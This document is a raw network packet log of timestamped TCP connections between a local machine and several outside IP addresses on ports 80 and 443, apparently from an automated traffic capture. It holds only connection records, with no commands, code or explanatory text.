                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.370100021 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.371793032 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.371834993 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.371977091 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.372025013 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.373735905 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.373783112 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.373867989 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.375623941 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.376050949 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.376065969 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.376099110 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.376111031 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.377398968 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.377614975 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.377629995 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.377675056 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.379095078 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.379141092 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.379184961 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.379250050 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.380913019 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.380997896 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.381050110 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.382719994 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.382797956 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.382843971 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.384557009 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.384668112 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.384730101 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.386394978 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.386466980 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.386482000 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.386523962 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.388155937 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.388214111 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.421745062 CET4434991734.117.59.81192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.421825886 CET49917443192.168.2.1034.117.59.81
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.427690029 CET49917443192.168.2.1034.117.59.81
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.427727938 CET4434991734.117.59.81192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.428073883 CET4434991734.117.59.81192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.431333065 CET49917443192.168.2.1034.117.59.81
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.432183027 CET49917443192.168.2.1034.117.59.81
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.453572989 CET44349916149.154.167.220192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.453644991 CET49916443192.168.2.10149.154.167.220
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.460011959 CET49916443192.168.2.10149.154.167.220
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.460036039 CET44349916149.154.167.220192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.460267067 CET44349916149.154.167.220192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.460319042 CET49916443192.168.2.10149.154.167.220
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.460692883 CET49916443192.168.2.10149.154.167.220
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.479330063 CET4434991734.117.59.81192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.495907068 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.496016979 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.496078968 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.496597052 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.496649027 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.496815920 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.496861935 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.498178959 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.498246908 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.498745918 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.498795986 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.498843908 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.498889923 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.500416040 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.500556946 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.500663996 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.501859903 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.501920938 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.501928091 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.502011061 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.503329992 CET44349916149.154.167.220192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.503402948 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.503458023 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.503499031 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.503544092 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.504803896 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.504849911 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.504883051 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.504923105 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.506468058 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.506511927 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.506546021 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.506587982 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.507816076 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.507862091 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.507971048 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.508138895 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.509160042 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.509211063 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.509217978 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.509279013 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.510596991 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.510644913 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.510653019 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.510696888 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.511892080 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.511935949 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.511970997 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.512011051 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.513261080 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.513365984 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.513382912 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.513401031 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.514688015 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.514734030 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.514806032 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.514849901 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.516083002 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.516109943 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.516124010 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.516146898 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.517522097 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.517569065 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.517749071 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.517846107 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.519149065 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.519217014 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.519284010 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.519326925 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.520690918 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.520750999 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.520909071 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.521217108 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.522090912 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.522134066 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.522135973 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.522178888 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.523186922 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.523233891 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.523267984 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.523308039 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.524435043 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.524492979 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.524523020 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.524560928 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.525738001 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.525801897 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.525867939 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.525909901 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.527168036 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.527219057 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.527267933 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.527374029 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.528516054 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.528578997 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.528647900 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.528778076 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.529911041 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.529961109 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.530019999 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.530162096 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.531302929 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.531356096 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.531368017 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.531409979 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.532752991 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.532795906 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.532830954 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.532886028 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.534214973 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.534277916 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.534306049 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.534346104 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.535537958 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.535552025 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.535587072 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.535603046 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.536849022 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.536899090 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.536941051 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.536973953 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.538259983 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.538348913 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.538352966 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.538395882 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.539644003 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.539705038 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.539772987 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.540167093 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.540993929 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.541076899 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.541184902 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.541224957 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.542422056 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.542512894 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.542562962 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.543781996 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.543828011 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.543906927 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.543941021 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.545173883 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.545283079 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.545319080 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.545367002 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.546644926 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.546709061 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.546749115 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.546789885 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.548017979 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.548038960 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.548065901 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.548089981 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.549334049 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.549562931 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.549616098 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.550776005 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.550828934 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.550843954 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.550884962 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.552136898 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.552275896 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.552324057 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.553546906 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.553611994 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.553679943 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.553715944 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.554857016 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.554910898 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.554953098 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.554989100 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.556257010 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.556318998 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.556365013 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.556401968 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.557638884 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.557660103 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.557689905 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.557706118 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.886363983 CET4434991734.117.59.81192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.886423111 CET49917443192.168.2.1034.117.59.81
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.886442900 CET4434991734.117.59.81192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.886454105 CET4434991734.117.59.81192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.886492014 CET49917443192.168.2.1034.117.59.81
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.887816906 CET49917443192.168.2.1034.117.59.81
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.887835979 CET4434991734.117.59.81192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.908476114 CET49920443192.168.2.10149.154.167.220
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.908520937 CET44349920149.154.167.220192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.908591986 CET49920443192.168.2.10149.154.167.220
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.908963919 CET49920443192.168.2.10149.154.167.220
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.908974886 CET44349920149.154.167.220192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.987271070 CET44349916149.154.167.220192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.987335920 CET49916443192.168.2.10149.154.167.220
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.987364054 CET44349916149.154.167.220192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.987380981 CET44349916149.154.167.220192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.987422943 CET49916443192.168.2.10149.154.167.220
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.988799095 CET49916443192.168.2.10149.154.167.220
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:31.988814116 CET44349916149.154.167.220192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:33.292985916 CET44349920149.154.167.220192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:33.293045998 CET49920443192.168.2.10149.154.167.220
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:33.296700001 CET49920443192.168.2.10149.154.167.220
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:33.296713114 CET44349920149.154.167.220192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:33.297049046 CET44349920149.154.167.220192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:33.297157049 CET49920443192.168.2.10149.154.167.220
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:33.298384905 CET49920443192.168.2.10149.154.167.220
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:33.343326092 CET44349920149.154.167.220192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:33.744801998 CET4990480192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:33.745026112 CET4992680192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:33.864952087 CET8049926185.215.113.43192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:33.865051031 CET4992680192.168.2.10185.215.113.43
